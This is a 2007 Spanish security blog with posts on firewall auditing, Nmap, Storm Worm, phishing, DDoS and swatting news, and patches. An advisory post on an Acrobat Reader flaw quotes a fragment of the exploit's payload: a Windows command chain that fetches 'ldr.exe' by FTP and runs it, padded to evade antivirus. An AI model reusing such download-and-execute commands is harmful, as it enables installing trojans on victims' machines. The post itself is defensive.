Como se puede tener tanta capacidad intelectual como para con 11 años empezar a trabajar bajo Linux y después de 5 años con 16 tener un nivel superior a la media, en informática y ser mal estudiante....aquí algo no me cuadra...

Está claro que nuestro sistema educativo está creado por cafres y no solo por este claro ejemplo, ya que no hace falta ser un hacha en informática con 16 años, para ver que nuestro sistema educativo no termina de triunfar, pero no ahora, sino desde hace unos añitos...

Aqui queda la noticia

Si te sientes identificado/a deja algún comentario....

Virus On the Wild: Storm Worm

2007-10-31T16:25:00.000+01:00

Esta noche, es una de esas noches de las que tenemos al año, muy propensas para ir en el subject de cualquier correo electrónico, con no muy buenas intenciones.... ;)

De los virus que nos "acechan" hoy en día, una gran cantidad están orientados al robo de credenciales bancarios, mientras que hay otro tipo de virus, los menos, los llamados "románticos" los cuales persiguen otra finalidad muy diferente que la obtención de credenciales y posterior "cyber-atraco".

Uno de estos virus de difinición "romántica" está apareciendo como uno de los que posee una tasa de infección muy alta, el virus al que me refiero es Storm Worm. Dicho virus está siendo detectado con un subject en muchos de los correos adjuntos en los que va, utilizando la cobertura que da una noche como la de hoy, utilizando ingeniería social, a la vieja usanza vamos....

Información sobre el virus:

Websense

Honeyblog

S21secBlog

Que tiempos aquellos los de 29a !!!!

Asi que ojo al parche, con el bichito, porque dará curro extra a algún Admin de seguridad que conozco...!!! y a pasarlo bien, sin que os den muchos sustos....

Un abrazo grande para los "bichos" que estan evitando las infecciones del día a día...Perico, Jorghino,David....gracias por lo que me enseñasteis...especímenes mios!!

Cambio y corto!

Manos arriba!! esto es un atraco...on-line

2007-10-31T12:37:00.000+01:00

Por un lado tenemos a....los bancos

Por mucho que nuestros bancos se empeñen en afirmar lo contrario, las gestiones que realizamos a través de la la banca electrónica no son seguras y les aplican riesgos, que no están en el lado del cliente de manera exclusiva...

Como se comenta en esta noticia

No sería mejor el dejar de echar la culpa solo a los usuarios y asumir las deficiencias propias en la seguridad?.Pero claro cuando se trata de asumir pérdidas mejor echar la culpa al usuario....y su formación en seguridad.

Y por otro lado....a los que se pasan de listos!

También están los que mediante el timo de la estampita, (phising) nos atracan on line, como dice esta noticia

Y la pregunta que me hago es...y todo este tipo de "atracos on-line" es la punta del iceberg? de cuantos casos no tenemos constancia con una solución para los afectados?

Bueno, menos mal, que nuestra seguridad ciudadana hace este tipo de eventos....les servirá de algo?....

En fin......

Alerta: Vulnerabilidades en productos Acrobat

2007-10-25T08:36:00.000+02:00

Buenas....

A pesar de que la vulnerabilidad no es nueva, y por lo tanto hay parche y nueva versión, existen numerosos exploit´s para Acrobat Reader.

Especialmente estan siendo como no..unos archivos adjuntos en el correo electrónico el principal foco de infección, los archivos vienen como “BILL.pdf” y “INVOICE.pdf”, aunque los nombres pueden cambiar según el exploit

obj<>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&” “nul.bat)/S/ URI>

Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso.Por lo que una vez instalado el código malicioso, explota la vulnerabilidad, con la cual, se puede instalar un bot en la máquina como robo de credenciales, por un troyano.

Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.

Aqui os pongo lo que recomienda la gente de SANS.
Parches para Acrobat Reader

Destacar que la vulnerabilidad afecta solamente a Pc´s con Windows Xp con Internet Explorer 7.0

Asi que ya sabeis....más vale prevenir....

Información sacada del Blog de Sergio Hernando

Nmap

2007-10-22T20:42:00.000+02:00

Llegó el momento tan esperado :P

A continuación os explicaré en sucesivas entradas como utilizar esta herramienta asi pues...vamos a darle chicha al nmap...!!!!

La herramienta está hecha para trabajar en diferentes sistemas operativos, tanto en Windows como en Unix. Dentro de mis preferencias, yo la utilizo en mi distro de linux (Fedora Core 7) y me va como la seda.... y la verdad nunca me ha dado por instalarla en un "ventanas" , pero me imagino que con el uso que hace de los recursos del sistema dicho sistema operativo....se perderá en funcionalidad... :P

La herramienta la podéis decargar de aquí

Una vez que os la instalais, sorpresa!!! no tiene iterfaz gráfica de usuario (GUI) funciona por comandos!!! asi que el que quiera pescar peces que se moje el culo!!!

Me consta que hay GUI para diferentes sistemas operativos, yo por lo que he visto de la interfaz gráfica es que le resta a la herramienta potencia, puesto que no la puedes configurar con todos los parámetros que tiene...asi que ha "comandear"

Lo dicho una vez instalada, tenemos que iniciar una shell ya sea a través de Ms-Dos o cualquier teminal de Unix.

Una vez iniciado el modo terminal:

Escribimos nmap

Y vemos las opciones que nos da la herramienta, así que lo que toca, es echarse un vistazo a las opciones porque mañana hablaré de ellas....

Cambio y corto!

SWATting or swatting

2007-10-22T15:22:00.000+02:00

Hasta los de azul pillan..

El jueves 18 de Octubre fue detenido un chaval de 19 años, como en los EE.UU, acusado de realizar un ataque denominado "SWATting or swatting".

Dicho ataque consta en spoofear el número de teléfono de tu víctima, para posteriormente llamar a los "Swat" y dar la falsa alarma de que en tu casa o en otro sitio pasa algo grave...

Al angelito no se lo ocurrió otra cosa que, llamar a los que primeros disparan y luego preguntan...aunque por ese país yo creo que todos actuan igual, sea los hombres de azul, gris o morado...

La noticia la leí aquí

Eventos de Seguridad

2007-10-22T12:07:00.000+02:00

Os informo de próximos eventos de seguridad en Madrid:

Capdesi , se ha abierto el plazo de inscripción!!! yo intentaré no perdérmelo.... el programa de las ponencias os lo dejo aqui.

Microsoft Technet Security Day

Ambos eventos son gratuitos....y tal como está el euribor...estas cosas se agradecen!!!!

Free Software

2007-10-22T11:44:00.000+02:00

He descubierto un programa muy parecido a uno que os puse en un una entrada antigua.Dicho programa, lo que hace es verificar dentro de los programas instalados en tu sistema operativo, el estado de las actualizaciones de los mismos. También tiene un servicio de news, donde se publican las diferentes actualizaciones de los 80.000 programas que soporta la aplicación.

Está en fase beta, y como sabeis, un programa que no esté actualizado, puede dar problemas tanto a nivel de sistema operativo como a nivel de seguridad.... ;)

Para descargar pulsa aquí

Nueva versión de Firefox 2.0.0.8

2007-10-22T11:30:00.000+02:00

El viernes 19 se ha lierado la nueva versión del navegador Mozilla Firefox 2.0.0.8. Esta nueva versión soluciona 8 vulnerabilidades, de las cuales 2 son consideradas críticas...

A parte, uno de los cambios que se recoge en esta nueva versión, es el tratamiento de determinadas URL´s maliciosas para sistemas operativos Windows XP. Como la solución a "cuelgues" del nevegador.

Pulsa aquí para descargarlo

Regresé...!!!

2007-10-22T11:23:00.000+02:00

Buenas a todos/as

Despues de una semana "infernal" que he sufrido para la preparación de un examen que tuve, vuelvo a estar on-line para refrescar los contenidos del blog....

Temas pendientes:

Nmap
Tratar nuevas publicaciones que tengo en el tintero....

Cambio y corto!!!

Para el finde...

2007-10-12T23:28:00.000+02:00

Lecturas recomendadas...

Discos duros híbridos, acceder al disco duro sin encender el Pc
Death Master
Auditando Mainframes

No todo tiene que ser informatica...

Los reyes del mambo...
Obey

Auditando Firewalls: NMAP

2007-10-12T21:43:00.000+02:00

Seguimos con la auditorá de firewalls, y esta vez toca hacer una introducción al todopoderoso NMAP.

Esta herramienta, posiblemente sea la mejor, por no decir que es el mejor scanner de puertos que existe, ya que lo tiene todo:

Es gratuita
La capacidad que tiene la herramienta por si misma.
Existe versión para Windows como para diferentes versiones de Unix.
La amplia información existente en la red para su uso

Que es NMAP?

Nmap es una herramienta que sirve para scannear puertos con una cantidad de parámetros impresionantes, tanto para los diferentes tipos de scanneo, como los métodos soportados para crear determinados paquetes.

Para que se usa?

El uso que se da a esta herramienta, es para ver que puertos tiene publicados un host y el estado de los mismos (open/close/filter).

Traduzco...;) En entradas anteriores, hemos hablado de la función de un firewall, y los diferentes tipos existentes en el mercado. Desde un punto de vista de un usuario doméstico nuestro firewall personal nos está monotorizando continuamente las conexiones y nuestro equipo estaría protegido.

Y yo os pregunto ahora, sabeis que puertos teneis publicados por el firewall y el estado de estos puertos?. En otras palabras pensais que vuestro firewall hace su trabajo?.Nmap es la herramienta que nos va a mostrar como trabaja nuestro firewall para protegernos de conexiones no deseadas ;)

Cuando se inicia un ataque a nivel de red, es fundamental conocer si un host está "vivo" y si dicho host tiene puertos publicados, para saber que tipo de servicios están detrás de esos puertos abiertos... :P

Cada vez que hago una auditoria de una instalación de un firewall realizo un scanneo de puertos para ver si ha sido bien configurado, es decir verificar que puertos están publicados a internet y el estado de los mismos ya que las sorpresas en seguridad implican....posibles ataques

En la siguiente entrada entraremos en "materia", explicando el uso de la herramienta y como interpretar los resultados que nos muestra.

Dedicado a los "admin" de firewalls en especial a uno de ellos de quien hoy es su santo...que por cierto... a ver si se anima a publicar alguna entrada...:P guapa!!!AlucarD!!!!!

Niña cierra los puertos...que te entran los barcos!!! ;))))

Free Software

2007-10-10T15:37:00.001+02:00

Os pongo el enlace a un software, gratuito de la gente de Secunia, el programa, que es para plataformas Micro$oft verifica si los programas instalados, están actualizados a la última versión y al corriente de los parches que los fabricantes han liberado.

Os servirá para ver evitar males mayores con los programas que teneis instalados y sus bug

Para descargar pincha aqui

Noticia: Ataque DDoS

2007-10-10T11:08:00.001+02:00

Buenas a todos/as

Me hago eco de una noticia que he leido en securityfocus, sobre un ataque llevado a cabo contra una web.

Dicho ataque ha consistido en crear una denegación de servicio (DoS), para que la web en cuestíon no estuviera disponible. El autor de 21 años de edad, tenía bajo su "mando" una botnet de nada menos que 7000 máquinas.....que mounstro el tío....

Claro, el tío SAM dió buena cuenta de ello deteniendo al personaje en cuestión.....

Con una noticia así, quiero daros a entender de que consta un DDoS , sus consecuencias y aplicarlo a la auditoria de firewalls que estamos llevando a cabo.

Como sabeis en capítulos anteriores, en las auditorias de firewall, hemos hablado de que una de las cosas que hace un firewall es bloquear conexiones, cerrando puertos para que no estén disponibles en internet. Pero que pasa si tenenemos un servidor web? ( puerto:80/ TCP) , pues que en el firewall, el puerto asociado al servicio debe de estar abierto, para que el público de internet pueda conectarse y desde su navegador ver el contenido de ese servidor.Ya que si cerramos el puerto asociado al servicio Http, no podremos publicar ninguna web y por lo tanto no dar ningún servicio, vamos que es como el que tiene hambre y se arrasca la barriga...

Ahora bien, nos encontramos que si tenemos un servicio publicado por internet como puede ser un servidor Http, con su puerto correspondiente ( Puerto: 80/TCP) abierto para tener acceso desde cualquier navegador, también está accesible, para "inundarlo" a peticiones, y crear una denegación del servicio.

Como veis un firewall no soluciona todos los problemas de seguridad ;)

Más adelante hablaré de este tipo de ataques, como detectarlos y como remediarlos...si es que se puede...;)

Por cierto queda pendiente en la siguiente entrada el uso del todopoderoso NMAP para el scaneo de puertos que puede tener un host abiertos/cerrados detrás de un firewall.

Como siempre, al final de cada entrada se esperan comentarios.....

Tal dia como hoy....

2007-10-09T22:03:00.001+02:00

Quiero hacer un recordatorio, al día de hoy, un 9 de Octubre....el motivo es porque tal día como hoy(hace 40 años), asesinaron al que podría ser, si hubiese sido informático, (que no médico) el mejor hacker de la historia... , quiero recordar a Ernesto Guevara de la Serna..."Che"

Personajes como este, hacen que se mueva el mundo, y que nos hagan ver las cosas desde otro punto de vista....

Hasta la victoria siempre!

El regreso de...Auditando Firewalls

2007-10-08T20:56:00.000+02:00

Buenas a todos, después de una semana de inactividad en el Blog, vuelvo a la carga...y curiosidades de la vida, vengo de vuelta de auditar un Firewall empresarial...la semana fue productiva....

No quiero empezar sin dedicar esta entrada al agente de Vitoria, que me han puesto las cosas muyyyyyy fáciles para poder currar, y como no a mi inestimable "GPS" con patas, que me guió tan bien por el maravilloso mundo de los pinchos....de lo que viene siendo Euskadi, si podéis, pasaros a conocerlo es una chulada.....

Y una vez cumplidas las dedicatorias, vamos al tajo....

Hay una frase que siempre aplico a una buena configuración de un Firewall, "niña cierra los puertos que te entran los barcosssss".

Y esto que quiere decir?, a lo que me refiero con esa frase, es que una de las funciones importante por no decir las más importante en un Firewall es cerrar los puertos que publica nuestro S.O, asi pues, si nuestro Pc, no necesitase enviar correo, deberiamos configurar nuestro Firewall, para que este puerto en concreto el 25 aparezca cerrado, y no admita ninguna conexión desde Internet no deseada...

La máxima es, que no publiquemos puertos que no sean necesarios, porque sino...nos entrarán los barcos!!!! hasta el muelle de descarga ;)

Asi pues, como sabemos, detrás de un puerto hay un servicio, dicho servicio, si está publicado en Internet, sin restricciones de conexión, puede ser vulnerable...Porque, aunque vuestro sistema este parcheado 100% y ese servicio no tenga bugs, siempre, repito siempre, hay una persona detrás, la cual configura ese servicio, sea, Administrador de sistemas, o un usuario casero....y por lo tanto, cabe la posibilidad de que haya un error de configuración, como veis la seguridad 100% es imposible...

Para un usuario malintencionado, lo primero que busca en una máquina a atacar, es un puerto abierto, y una vez que descubre ese puerto abierto, busca la versión del servicio publicado e intenta atacar, con la información recibida...(versión del S.O, versión del servicio publicado, ya sea FTP, SMTP etc...) ya sabeis la información es poder...

En la próxima entrada aprenderemos a manejar alguna herramienta por no decir la "herramienta" de scanneos de puertos, el todo poderoso NMAP, larga vida NMAP....los que van a scannear te saludan!

Auditando Firewalls: De sockets, puertos y servicios

2007-09-30T11:12:00.000+02:00

Sigamos con lo siguiente en la auditoría de firewalls, el concepto de puerto , socket y servicio algo fundamental para enterder como funciona un firewall, y asi como auditarlos ;)

En capitulos anteriores definimos un firewall, como un elemento soft que monitorizada las conexiones entrantes y salientes de un host. Y os preguntareis para que sirven las conexiones? :P, para eso nos meteremos a ver un poco de TPC/IP.....

Como sabeis el sr TCP/IP es un protocolo , y como tal dicta unas normas...a las que los firewalls se someten ;) como el resto de programas que utilizamos (clientes de correo, nevegador, emule :p ftp).Entre muchas cosas TCP/IP nos dice que para que determinados servicios funcionen, tienen que estar publicados en una serie de puertos predefinidos..

Es decir, si queremos enviar un correo electrónico desde nuestro programa cliente, este enviará la petición contra el puerto 25 del servidor que está escuchando...el cual que nos permitirá enviar correo electrónico al destinatario que queramos.
Para esta acción, el firewall que tenemos en nuestro pc tiene que permitir la salida del tráfico generado por el protocolo SMTP y el servidor que está en el otro lado tiene que escuchar el tráfico que vaya dirigido hacia ese puerto 25 (para lo cual su firewall tiene que permitir tráfico contra ese puerto) que también forma parte del mismo protocolo.

Y quien permite que esa conexión, se realice? nuestros queridísimos firewalls!!! ya que permiten el tráfico que se genera a ambos lados (tanto de nuestro pc como del servidor de correo) y se produzca una conexión, para que el servicio pueda funcionar, y se puedan enviar esos correos tan altruistas con archivos adjuntos .ppt que tanto nos gustan... <8-)

Asi pues, como vereis, lo que hacen los firewalls es permitir o denegar flujo de conexiones contra puertos determinados...

Un esquema explicativo funcionaría asi.... servicio-socket-puerto.....

Un servidor Http , para que pueda publicar páginas web, tiene que tener un servicio; que sería un servidor web como por ejemplo Apache o ISS de microchoft, que va "conectado" a un socket, el cual va asociado a un puerto en este caso por ser el protocolo Http, sería el puerto 80.

Y???, como lo veis?....

Un poco más abajo de esta mismo artículo se pueden poner comentarios ehhhhh son gratis...;)

Cambio y corto!

Lecturas recomendadas para el finde

2007-09-28T13:54:00.000+02:00

Hakin9
Botnets
Demo de Exchange Server 2007 en imagen de virtual pc
Algo sobre protocolos

Si me da tiempo y el cierre del Moreno´s Bar me lo permite :P seguiré este finde con la auditoria de firewalls, ñam ñam, quedan cosillas de teoría y luego la práctica ;) jejejeje

Y...se siguen esperando comentarios.....iogaaaaaaaaaa!!

Cambio y corto!

Capsdesi

2007-09-28T09:14:00.000+02:00

Buenas todos/as

Por fin viernes.. santo viernes

Asi que entremos en materia que el fin de semana ya está aquiiiiiiiiiiiiiiiiiiiii!!!.

Todos los años en la Universidad Politécnia de de Madrid (UPM) de la que soy miembro desde hace un par de años, (yaaaaaaaa padre yaaaaaaaaaaa si hubiera estudiado más antes....), se realiza el CAPSDESI, que son unas conferencias, en donde gente experta, trata diferentes temas sobre seguridad de la información, el plazo de inscripción comienza el 15 de octubre y la asistencia es gratuita pero de aforo limitado a 550 almas yo iré y tu???

Y recuerda cual es el lado oscuro....

Auditando firewalls: Esquema de red "empresarial"

2007-09-26T13:03:00.001+02:00

Lo que tenemos aquí sería el típico esquema de red a nivel empresarial, con dos niveles de firewal ;) para implementar más seguridad, y controlar el tráfico entrante y saliente en dos puntos, y si os fijais los firewalls aparecen en parejas, lo que se denomina cluster, porque en caso de fallo, la empresa, no se queda "al descubierto" y sus conexiones no se ven afectadas, ni desde un punto de vista funcional ni de seguridad.

También hay que fijarse en lo que se llama zona desmilitarizada o DMZ, a ver como lo explico... :p es una red separada de la red privada donde se desarrolla la actividad empresarial de los usuarios y servidores corporativos.

Y esto porque se hace?, muy sencillo, en una DMZ, es donde nos encontramos los servidores que tienen direccionamiento público, y publican servicios en internet, os acordais del ejemplo casero? ;) como tal, estos servidores son los que se "exponen en internet" y son sobre los que el riesgo recae, por ser públicos, por eso mismo, en caso de que ocurra un incidente de seguridad, están apartados de la red privada corporativa para que, ese incidente no tenga repercusión en la red privada y por lo tanto en la organización entera.

Que os parece todo este mogollón? Espero comentarios...... :P

Auditando firewalls: Esquema de red "casero"

2007-09-25T17:25:00.000+02:00

Seguimos con un poco más de teoría sobre firewalls, como veis, esta sería la una arquitedtura de red en modo "casero", en donde cualquier conexión (entrante o saliente) es filtrada por el firewall.

Lo que tendríamos aquí es una conexión a internet con nuestra ip pública suministrada por nuestro queridísimo ISP <8-( con lo que nuestro Pc, se presenta en internet con la famosa ip públia. Y claro si nos "presentamos" en internet con nuestra ip, es la que al resto del mundo le importa para acceder a los posibles servicios que ofrezcamos, como para nosotros acceder a los servicios que nos ofrecen.

De tal manera que si monto un servidor "efetepe" y alguien quiere acceder tendrá que poner en su programa cliente de "efetepe" la dirección pública que ofrece ese servicio al resto del mundo.

Fácil no?, os recuerdo que al final de cada "artículo" que escribo podeis poner comentarios...de lo mucho que os gusta la web etc... :P inclusive, de las posibles dudas que tengais....

Auditando firewalls que es gerundio!

2007-09-25T10:02:00.000+02:00

Salud2, navegantes....

Siendo martes, día precioso, ya que no queda nada para el fin de semana (madreeeeeeeeeee), nos iniciaremos en el maravilloso mundo de los firewalls, que mejor día que un martes? asi que manos a la obra!

Para empezar, definiré un firewall, como un elemento software que contiene una tabla de estado de las conexiones que pasan por el, tanto entrantes como salientes.En dichas tablas, es donde el firewall interpreta las conexiones para posteriormente realizar las acciones que le hemos indicado, es decir, bloquear o permitir el tráfico que pasa por el.

Distinguimos dos tipos de firewall:

Firewalls a nivel de aplicación.
Firewalls a nivel de red.

Cada uno de ellos se mueve en capas diferentes del modelo O.S.I

Firewalls a nivel de aplicación

Estos firewalls son lo que conocemos habitualmente como firewalls personales, actualmente, están enfocados a usuarios domésticos. Este tipo de firewalls tienen como misión el vigilar las conoxiones, que se realizan desde y contra nuestro ordenador personal, desde un punto de vista de aplicación.
Es decir, los firewalls personales, controlan las conexiones que realizan las aplicaciones instaladas en nuestro ordenador personal, las cuales, necesitan conectarse a internet, o desde internet necesitan conectarse a ellas :(

Existen en el mercado numerosos tipos de firewalls de aplicación, y bastantes de licencia GNU

Firewalls a nivel de red

Este tipo de firewalls se mueven a un nivel más bajo del modelo OSI, entre las capas de nivel 2 , 3 y 4. Están pensados para un entorno empresarial, en donde la cantidad de conexiones que se puenden realizar, son cientos o incluso miles. Al haber una complejidad de conexiones a este nivel, los "vigilantes" (que son los firewalls) de este tipo de conexiones, tienen que tener unas características especiales, y diferentes a lo que son los firewalls de aplicación.

Dichas características entre otras son:

Entorno de adminsitración más complejos.
Alta disponibilidad, mediante clusters.
Entorno de monotorización de las conexiones rechazadas permitidas, etc
Etc..

Una vez, que hemos hecho una breve pero intensa introducción de lo que son los firewalls, empezaremos a "meterles mano" en los siguientes capítulos.

Cambio y corto!

Manifiesto

2007-09-24T16:51:00.000+02:00

Buenas

Mediante este medio tan poderoso como son las redes sociales y para simplificar los blogs, a partir de ahora, intentaré transmitiros, como vivo la seguridad de la información....y algunas cosas más que me parecen revelantes, tal como se mueve el mundo hoy en día...

Compartir conocimientos, es la finalidad de este blog, todo el mundo debería de terner derecho a saber lo que ocurre en sus ordenadores y en la "selva" de internet con su fauna corespondiente....porque hay cada bicho suelto....

No os espereis un blog para realizar el "mal" como por ejemplo de como conseguir la contraseña del msn de tu chica o de como pisarle el wifi al vecino vamós que duros a 4 de las antiguas pesetas no va a ver, sino un sitio donde se puedan compartir conocimientos, e inquietudes con el único fin de aprender algo más.

¿Para empezar os suena lo que os pongo más abajo?, os avanzo que no es el programa electoral de ningún partido político :P

Pasión
Libertad
Conciencia social
Verdad
Anti-Fascismo
Anti-Corrupción
Lucha contra la alienación del hombre
Igualdad-social
Libre acceso a la información
Valor social (reconocimiento entre semejantes)
Accesibilidad
Actividad
Preocupación responsable
Creatividad

Mas información: http://es.wikipedia.org/wiki/%C3%89tica_hacker

Haceros una idea de por donde van a ir los tiros...

Cambio y corto!